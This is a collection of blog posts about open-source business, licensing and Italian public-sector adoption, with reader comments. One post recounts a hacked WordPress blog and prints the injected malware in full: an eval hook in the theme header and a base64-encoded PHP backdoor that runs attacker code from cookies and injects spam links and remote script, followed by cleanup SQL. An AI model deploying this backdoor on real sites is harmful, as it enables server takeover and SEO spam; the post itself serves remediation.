Give a gift that really counts, the Italian OpenOffice.org Association suggests you a fantastic gift idea: OpenOffice!
Seagulls or penguins? I remember that normally penguins don’t fly.. by dsevilla
Need some original CD’s covers? Choose among the community’s ones.
Let’s fly with OpenOffice.org’s seagulls: use it, copy it and make it a present, it is legal!
Mark Radcliffe, General Counsel of the Open Source Initiative and personally involved with the reviewing the GPLv3 draft, recently wrote a post about 2007 Top Ten Free and Open Source Legal Issues.
Does it take two to speak the truth? by TW Collins
Radcliffe, probably one of the most influential attorney of the open source scene, in his list of the top ten FOSS legal developments in 2007 wrote:
9. New License Options. Two of the most controversial issues in FOSS licensing, network use and attribution, were addressed in new licenses adopted this year. A “network use†provision imposes a requirement that when a program makes functions available through a computer network, the user may obtain the source code of the program. Essentially, it extends the trigger requiring providing a copy of the source code from “distribution†of the object code (as required under the GPLv2) to include making the functions available over a computer network. An “attribution†provision requires that certain phrases or images referring to the developing company be included in the program. This provision was very controversial on the License Discuss email list for OSI. The Free Software Foundation published the Affero General Public License in the fall which expanded the scope of the GPLv3 to include a “network use†provision. A limited form of attribution was included in the GPLv3. And OSI approved the Common Public Attribution License which included both the “network use†and “attribution†provisions.
I am not alone thinking that the debate on attribution is over now, and I guess Radcliffe is probably the (open source) attorney behind what I called SugarCRM’s original way to abide the GPL.
Want to learn more about open Source legal issues?
Matt Asay just made public Radcliffe’s abstract for the upcoming Open Source Business Conference, entitled “Implementing your Open Source Business Strategy through Your Legal Strategy“, definitely a must attend session.
oss, open business, commercial open source, sugarCRM, GPL, FSF, OSI, MarkRadcliffe
I am proud and happy to announce that the book I coauthored “Finalmente LIBERO Software libero e standard aperti per le pubbliche amministrazioni” (Finally FREE: free software and open standards for public administrations) is out.
The book is aimed at public authority leaders, providing them with information to make informed decisions on open source acquisition and usage. The book starts off by describing open source and free software characteristics, and then goes on reporting Public Administrations’ experiences with open source adoption, generally recognized mature solutions and also addressing interoperability issues.
I wrote the Open Source Business Model chapter, starting off by making clear commercial is definitely not an antonym of FLOSS, and then highlighting the most important differences among proprietary, corporate open source and community open source paradigms (plus some experiences, like what is going on at Codeplex). Idealtypes are not the ultimate answer, but they can help to understand open source vendors’ approaches and eventually choose the most appropriate to accomplish our ICT needs.
About open source business models I extensively wrote about opportunities and threads regarding appropriating returns from commons, and how important is for open source firms to symbioticly foster their own communities. I reported also many different open source business model taxonomies, along with some business development considerations.
Want to know more? Buy the book! 😉
The book has been published by Mc Graw Hill, and it is in Italian.
Historically the Italian Public Sector has been pretty conservative to move toward open source adoption, but over the last two years many regional laws (PDF, Italian) and even the 2007 Italian Budget law paid special attention to free software.
Just one year ago the Italian Budget law considered open source as a favorable factor in assigning funds to sustain innovation by local public administrations.
A meme by ::MeMe::
Beatrice Magnolfi, undersecretary State for Public Administration Reform and Innovation, last year commented the law saying:
We do support Italian software industry growth, an archipelago of SMEs managed by young people, bringing innovation and creativity into the market.
She is perfectly right talking of “archipelagos” considering that the Italian ICT is highly fragmented (93,7 percent of ICT firms employ less than 9 employees), and I share her concern and interest toward small firms.
Speaking with senior public administrators and officers I found out that no one knew anything about those funds, and well informed voices say they have been allocated for different purposes.
No news good news? I doubt..
A Meme for Italian politicians: transparency pays, tell us the (open source) truth!
SI: Establishment of the Slovenian Open Source Center – An Open Source Center has been established in Slovenia to provide consulting and support services to end users as well as to design solutions for both the public and private sector. The Centre is managed by a consortium of companies and non-profit organisations and operates through a call center and a helpdesk service. Operations will be partly covered from sales of services on the market and possible European Funds.
What’s the Use of Free Software? Glyn Moody observes that the hottest are in computer today are dominated by the use of open source software.
Magnolia 3.5 CE Now Final – Magnolia Community edition is out. Differences between Enterprise and Community Edition are:
Magnolia’s Site Designer (a WYSIWYG editor for developing display templates), a JSR-168 (portlet spec) connector, the option to use Day’s CRX rather than Apache JackRabbit for a repository, and, of course, the ability to buy support.
The OpenInterface Program– The OpenInterface platform, an open source project conceived to integrate components developed in different programming languages.
Moderated screencasting from RedMonk: Check it out – RedMonk’s “moderated screen-casting†rocks!
About Open Source Fat check How could I possibly miss this new blog analyzing blog postings about open source and doing some basic fact-checking? A must read, thanks to Luis Villa.
Fleury Gets an office – Savio reporting Fleury making public he became an advisor for Appcelarator, started an interesting conversation on Open Source business models shifting.
Movable Type Open Source – Finally Movable Type IS open source! Meme for my friend and Free Software Advocate Arturo Di Corinto – who authored many books about free software and free knowledge – maybe he is interested to get back to Movable Type now..
Benjamin Mako Hill, who recently joined the FSF board put an appeal on line, as earlier did Peter Brown, FSF Executive Director.
Now is the time to join and give to Free Software Foundation. 2008 is going to be extraordinarily important year for free software.
Eben Moglen likes to quote Gandhi’s “first they ignore you, then they laugh at you, then they fight you, then you win” progression when describing the free software movement. As I pointed out when I joined the FSF board, we’re beginning to see powerful interests fighting free software. It’s going to increase in the next few years. Things will probably get a lot uglier for free software before they get better. We can win but things are far from settled. The FSF is the front-line organization in this fight and we need a robust and proactive foundation, and an active and involved membership, if we’re going to win.
Here are the issues that I’m going to pushing the FSF to pursue in the next year.
Expanding activism outside our traditional technologist communities:
In part through the work of projects like Defective By Design, we’ve seen the tide turn for DRM on music in what what may be the FSF’s greatest success last year. I’m going to push the FSF to continue the campaign to attack DRM for video, eBooks, and the other places it is cropping up.
The most remarkable thing to me about Defective By Design is that its participants and supporters are not, for the most part, people who develop or use GNU/Linux or even know what GNU is! If advocacy for software freedom involves a conversation we can only have with people who understand what POSIX is and how one uses it, we’ve already lost. Through DbD, BadVista, and other projects, the FSF has made major strides in the last year. It need to do much more and needs your support to do so.
Get proactive about software patents:
As a community, we’ve had our head in the sand about software patents for far too long. There are companies and patent trolls sitting on massive, growing piles of software patents. They are not our friends and they do not mean us well.
One cannot write non-trivial software today without running a serious risk of infringing patents. The software patents minefield we’ve found ourselves in is a very fundamental threat to the success of free software and we’ve already begun to see the first casualties and costs. We must eliminate software patents. Now.
The US is very important in this fight (much patent law is “exported” from the US) and almost no organization is working on software patent elimination there. Not enough people are thinking and acting strategically on this issue. The FSF is planning to make major steps in this fight in the coming year and we need your support to do so.
Web services and the changing face of software:
This last year, I worked to help launch the new version the AGPLv3. The license addresses the role of copyleft for software like web-services which, due to the legal particulars of the GPL, did not extend to the purveyors of web services. Of course, access to source code does not make the users of all web-services free (e.g., the GMails and the Facebooks).
Nobody seems to know what freedom for webserver entails. There might not even be good answers. In the next year, I’m going to push the FSF to help start several conversation and to begin to follow up on what I think was an important first step with the AGPLv3. While this is not a major organizational priority yet, it’s a major action item that I will be pursuing through the FSF. If you feel strongly about this issue, whatever your position, become a member, stay involved as these projects develop, and have your voice be heard. We don’t know the answers yet and we need your input as much as we need your action.
I am glad Mako  is willing to push AGPL, even if I doubt AGPL will really help to solve the GPL loophole. Loophole or not, I really wish to help FSF to raise funds, and I hope this post helps.
Computer Business Review Italy and Next Value organized the conference “IT Governance: aligning and synchronizing IT with the business“, held in Milan on Tuesday. I was originally supposed to give a speech, entitled “Open Source Software Selection: the cost of free“, but I broke my foot and I couldn’t join the event.
Open source software selection costs are high, as results also from COSPA’s findings: up to 40% of migrations’ support costs, considering both searching for software and searching for documentation costs.
Finding and Selecting open source software is often an underestimate task. Only SourceForge guests about 150.000 different open source projects, and about 18.000 open source projects are mature and stable: eating fish from the open source sea is safe as long as they are not eaten raw.
In the “Finding and Selecting software” chapter The Guide for SMEs reports:
There are three separate steps that should be taken to successfully identify a set of FLOSS packages:
- identify your requirements
.- search for packages matching your functional requirements
- select the appropriate package from the list
The first step is an often overlooked activity, but is crucial for a successful adoption;
There are several important web sites that provide information on available software, both in an undifferentiated way (like SourceForge, that mainly acts as a project repository) and through detailed reviews and comparisons with proprietary software.
Forge based sites, like SourceForge, Savannah or gna.
Software announces sites, like FreshMeat or sourcewell.
Lists of software equivalents, like Osalt.
Once a set of potentially useful applications have been found, it is fundamental to evaluate between the various applications. This can be done applying the QSOS methodology [read the guide for a full description of the methodology].
Other useful tools I would mention to manage software selections are: Ohloh, included its new “Compare” function, to know about code, developers, languages and licenses. And also Google trends, to learn about how much is the know an open source product.
Firms offering “horizontal†support (SpikeSource, SourceLabs, OpenLogic Optaros), meaning companies that sell services not related only to a specific package but to a wide range of packages, are just addressing the OSS selection issue. And more will come, I believe.
While Open Source programs are all created equal (from a cost point of view), but some are more equal than others when you need them up and running in your own environment. Buy only fresh fish!
Two days ago a my Northern European friend Era after reading a post adviced me that my blog site have been silently owned by Search Engine spammers. Spam in blog is definitely not a new phenomenon, but I knew very little of spam injection before, and I hope my experience can help other WordPress users.
The problem was that a foreign div loads in the header “div id=goro“, and a list of spam links to various porn links. I asked my dear webbie to help me, and she put me in touch with Francesco Mosca, who actually fixed the problem as follows.
Within the theme’s page header.php, hacked using likely a wordpress 2.0.1 bug:
create_function('', get_option("blog_headers")); ?> [snipped code]<?php $wp_headers() ?>
Actually those lines of code were calling the code contained within the database in the blog_headers option (“wp_options” table, option_name = ‘blog_headers’):
611a2dee6df9249f21eb25f254b7f8f3611a2dee6df9249f21eb25f254b
7f8f3611a2dee6df9249f21eb25f254b7f8f3611a2dee6df9249f21eb25
f254b7f8f3611a2dee6df9249f21eb25f254b7f8f3*/ $c55375dba9d2f1867f4083acce95988dd=’Pz48P3BocAoJaWYoaXNzZX
QoJF9DT09LSUVbJ2F1dGgnXSkgJiYgJF9DT09LSUVbJ2F1dGgnXSA9PSAn
NjExYTJkZWU2ZGY5MjQ5ZjIxZWIyNWYyNTRiN2Y4ZjMnKSB7CgkJaWYgK
Glzc2V0KCRfQ09PS0lFWydzaG93X3Rlc3QnXSkpIHsKCQkJZWNobygiPFRF
U1RQQVNTPiIpOwoJCX0KCQkkaSA9IDA7ICRsaW4gPScnOwoJCXdoaWxlI
Chpc3NldCgkX0NPT0tJRVsnbGFzdGluJy4kaV0pKSB7CgkJCSRsaW4uPSAk
X0NPT0tJRVsnbGFzdGluJy4kaV07CgkJCSRpKys7CgkJfQoJCWlmKHN0cmx
lbigkbGluKT4wKSB7CgkJCWVjaG8oIjxsYXN0aW4+Ii5tZDUoJGxpbikuIjwvb
GFzdGluPjxleC1kYXRhPiIpOwoJCQkkbGluID0gcHJlZ19yZXBsYWNlKCcvXy
8nLCAnKycsICRsaW4pOwoJCQlldmFsKGJhc2U2NF9kZWNvZGUoJGxpbikpO
woJCQllY2hvKCI8L2V4LWRhdGE+Iik7CgkJCSRjb2RlID0gZ2V0X29wdGlvbig
nYmxvZ19oZWFkZXJzJyk7CgkJCWlmIChwcmVnX21hdGNoKCcvOTU5ODh
kZD1cJyguKj8pXCcvcycsICRjb2RlLCAkcmVncykpIHsKCQkJCWVjaG8oIjx2
ZXI+Ii5tZDUoJHJlZ3NbMV0pLiI8L3Zlcj4iKTsKCQkJfQoJCX0KCQlleGl0KCk7
Cgl9CgkkdGV4dCA9IGdldF9vcHRpb24oJ3JlY2VudGx5X2FkZGVkJyk7Cgkkd
WEgPSAkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107CglpZiAoaXNzZXQ
oJHRleHQpICYmIHN0cmxlbigkdGV4dCk+MCAmJiAocHJlZ19tYXRjaCgnLyhib
3R8c3BpZGVyfHNsdXJwfGdvb2dsZXxleHBsb3JlcnxmaXJlZm94fG9wZXJhKS
9pJywgJHVhKSkpIHsKCQkJCSRycSA9ICRfU0VSVkVSWyJSRVFVRVNUX1VS
SSJdOwoJCQkJJHJzcyA9ICJyc3NfIi5tZDUoJHJxKTsKCQkJCSRzZWVkID0gd
W5zZXJpYWxpemUoYmFzZTY0X2RlY29kZShnZXRfb3B0aW9uKCRyc3MpKS
k7CgkJCQlpZiAoISRzZWVkKSB7CgkJCQkJZ2xvYmFsICR3cGRiOwoJCQkJCS
R3cGRiLT5xdWVyeSgiSU5TRVJUIElOVE8gJHdwZGItPm9wdGlvbnMgKG9wdG
lvbl9uYW1lLCBvcHRpb25fdmFsdWUsIG9wdGlvbl9kZXNjcmlwdGlvbiwgYXV0
b2xvYWQpIFZBTFVFUyAoJyRyc3MnLCAnJywgJycsICd5ZXMnKSIpOwoJCQk
JCSRzZWVkID0gJHdwZGItPmdldF92YXIoIlNFTEVDVCBMQVNUX0lOU0VSVF9
JRCgpIik7CgkJCQkJdXBkYXRlX29wdGlvbigkcnNzLGJhc2U2NF9lbmNvZGUoc2
VyaWFsaXplKGFycmF5KCRzZWVkLCRycSkpKSk7CgkJCQl9IGVsc2UgewoJCQ
kJCSRzZWVkID0gJHNlZWRbMF07CgkJCQl9CgkJCQkkdGV4dCA9IGJhc2U2NF
+JHdjKSB7CgkJCQkJJHNlZWQtPSR3YzsKCQkJCX0KCQkJCWVjaG8gJzxkaXY
gaWQ9Imdvcm8iPic7CgkJCQllY2hvIGpvaW4oIiZuYnNwOyIsYXJyYXlfc2xpY2
UoJGEsJHNlZWQqMzAtMzAsMzApKTsKCQkJCWVjaG8gJzwvZGl2PjxzY3JpcHQ
gdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4nOwoJCQkJZWNobyAiZnVuY3Rpb24g
Z2V0bWUoc3RyKXsgdmFyIGlkeCA9IHN0ci5pbmRleE9mKCc/Jyk7IGlmIChpZHg
gPT0gLTEpIHJldHVybiBzdHI7IHZhciBsZW4gPSBzdHIubGVuZ3RoOyB2YXIgbm
V3X3N0ciA9ICcnOyB2YXIgaSA9IDE7IGZvciAoKytpZHg7IGlkeCA8IGxlbjsgaW
R4ICs9IDIsaSsrKXsgdmFyIGNoID0gcGFyc2VJbnQoc3RyLnN1YnN0cihpZHgsID
IpLCAxNik7IG5ld19zdHIgKz0gU3RyaW5nLmZyb21DaGFyQ29kZSgoY2ggKyBp
KSAlIDI1Nik7IH0gZXZhbChuZXdfc3RyKTsgfSI7CgkJCQllY2hvICJnZXRtZSgna
HR0cDovL3BhZ2VhZDIuZ29vZ2xlc3luZGljYXRpb24uY29tL3BhZ2VhZC9zaG93
X2Fkcy5qcz82MzZENjA3MTY4NUY2NzZDMjU1RDVBNjgzODVFNTY1RDU0NUM
2MTJFNjQzMzREMTAwRTRENTQ1NjUyMDkwQTBFNTI1MjU2NDg0MDA4M0Q0
MTRBNDY0MTM1NEMwRkY4M0UzRTNDMzJGMzA2Jyk7IDwvc2NyaXB0PiI7Cgl
9Cgo/Pg==’;$e_ = error_reporting(0); eval(base64_decode($c55375dba9d2f1867f4083acce95988dd)); error_reporting($e_); return true;
Decoding it with base64_decode came out that such code calls an external javascript that pastes on the fly some spam links in the page, writing also in the option field strings of this form rss_
mysql> select option_value from wp_options where option_name =‘rss_fffbb7d85fc00f0c0d14abf4fde94ce3’;
+————————————+
| option_value
|+————————————+| YToyOntpOjA7czo0OiIxMTg3IjtpOjE7czoxODoiL3d3dy5tYW5kcml2YS5jb20vIjt9 |
+————————————+
Besides erasing the above mentioned lines from the header.php, you need also to erase blog_headers and ‘friends’ from the database:
delete from wp_options where option_name = ‘blog_headers’;delete from wp_options where option_name like ‘rss_%’ and option_namenot in (‘rss_language’,’rss_use_excerpt’,’ rss_excerpt_length’);
Find the offending goro spamware injection before google bans you from internet pipe. Amazingly as soon as I got it fixed my blog got its previous position.
Note: My blog is under repair these days, the old theme will soon be available, along with twitters and skype alert. Sorry about that.
Same on footer, same solution
You’re not alone in this. I found myself a victim of it after upgrading my WordPress to 2.3.x in December. Fortunately, I found someone else who had encountered it and their blog had some suggestions on how to deal with it. I blogged about the experience on my blog at http://gordon.dewis.ca/2008/01/06/expunging-the-wordpressnetin-spam-injection-hijack/
It’s amazing how many people are still affected by it.
Thanks for posting this. While a similar exploit only got my main blog, your post here really helped me know what to look for in the database. Combined with the WordPress 2.5.1 post over at WordPress.org, I was able to get this problem handled.
I guess that’ll teach me to keep my software up to date. I wonder how long it’ll take until I’m back on Technorati and Google Blogsearch.
Thanks again for your post.
I am really glad it helped you, when I got in troubles I felt really hopeless. As a matter of fact google has proven to be really fast to give my rank back, and I wish you best of luck with that.
Good article! your site let me learn more. Thanks!Pls keep up to date.
Thanks for posting this. Mine was hacked with the same hack on the 13th (yes friday). Not great luck for friday the 13th but this post gave me peace.
Hi, why don’t you activate the akismet spam? I have that kind of spam in few blog.
I do Joe, I do.
Very useful information for me. Thank you.
Most all blog hacks are from people not upgrading their blog software.
If you don’t make a ton of changes, just backup your template one time, then create or download a script to email you a database dumb every couple days.
Thanks for posting this. Mine was hacked with the same hack on the 13th (yes friday). Not great luck for friday the 13th but this post gave me peace.
Hello!
Very Interesting post! Thank you for such interesting resource!
PS: Sorry for my bad english, I’v just started to learn this language 😉
See you!
Your, Raiul Baztepo
I’ve been seeing a lot of chat lately on WordPress security problems. They are currently leading in the blog race, but will, for sure, start losing people unless they show some dramatic improvement very soon.
Sorry about your problems but glad you found a fast fix and we’re restored to your previous Google rank.
Graham
After the announcement of the integration with Facebook Alfresco made public that Alfresco Social Computing Platform – which integrates Alfresco with Adobe Flex, Facebook, iGoogle, MediaWiki, TypePad and WordPress – will be available for download by tomorrow on SourceForge.
While Alfresco is probably not the first open source projects to experiment with Facebook, John Newton – co-founder and Chief Technical Officer of Alfresco – believes that pushing for the expansion of social computing in the enterprise is an imperative. John on his “manifesto for Social Computing in the Enterprise” states:
The next generation of enterprise employees who started using the internet in their early teens have only known this evolving culture of free and creative development of the internet and now demand better of the enterprise software that they meet.
While I don’t know if every CTO should be on Facebook, as says Jon Williams at the New York CTO blog, I believe Seth Gottlieb‘s theory is correct:
most Intranets fail as social collaboration tools because they cannot capture the energy and passion that seems to form spontaneously on the web. And my theory goes on to assert that people do not invest their personal energy on their corporate intranet because they don’t own it.
John, why are you addressing Facebook audience?
In order for ECM to move from 10% that are specialists in a firm (compliance, doc control, regulatory, maintenance and web sites) to the 90% that need it to control out-of-control information on shared drives, it would need to introduce compelling user interfaces based upon social networking and social computing.
I think Alfresco did a great move addressing needs of the new generation of knowledge workers is enabling a new enterprise vision of social computing.
Last but not least Alfresco rather than building everything on its own is defining an architecture of participation based on Web Scripts Framework. Let’s see if it will eventually help them to foster their community.
The fourth Roman barcamp – Piublog 2007 – took place today within the event “Più libri più liberi” (eng.: more books, more freedom), the annual fair of the independent Italian publishing houses, held since 2002. A good chance to meet again old friends or why not make new ones on a gloomy, raining day in Rome.
Leo Sorge was a very nice host, embarrassed because the venue actually wasn’t totally appropriate for a barcamp, being just a single room and lacking of Wi-Fi facilities. Fabio Masetti opened the barcamp, later Riccardo Cambiassi – who originally “imported” the barcamp in Italy – impressed me with a cool slideshow on barcamping.
In the afternoon I enjoyed Nicola Mattina on corporate blogging, and Piergiorgio Lucidi introduction to microformats and Semantic Web.
I spent also time talking with people, among others Antonio Pavolini, Andrea Martines, Feba, Giulio Gaudiano e Stefano Epifani. I met for the very first time Dario Salvelli and I suggested Nicola Risitano (LSLUG, OpenCamp) to have a look at the Open Source Guide for SMEs. Andrea Genovese was supposed to talk about his coworking project, but eventually Fabio Masetti spoke on behalf of him.
Ciao Roberto!
È stato un piacere conoscerti. Grazie dei complimenti, immeritati.
Le slide non abbiamo fatto in tempo ad esplorarle per bene ma le trovi su SlideShare se ti interessano.
Spero di sentirti presto, fammi sapere quando passi da Londra!
R
Roberto, i’am really nice to met you: i hope to talk more for the next time..
Ehi, take care!!!
Nice to meet you, and sorry we could n’t spend more time for our chat.
I wish you a quick recovery!
Cheers,
🙂
a
Thank you for your feedback about my talk during this event!
Thank you again for your feedback sent to Sourcesense: now I’m working in a real Open Source company 😀
Ciao
Piergiorgio
RaiulBaztepo, and 10 others are discussing. 
Reply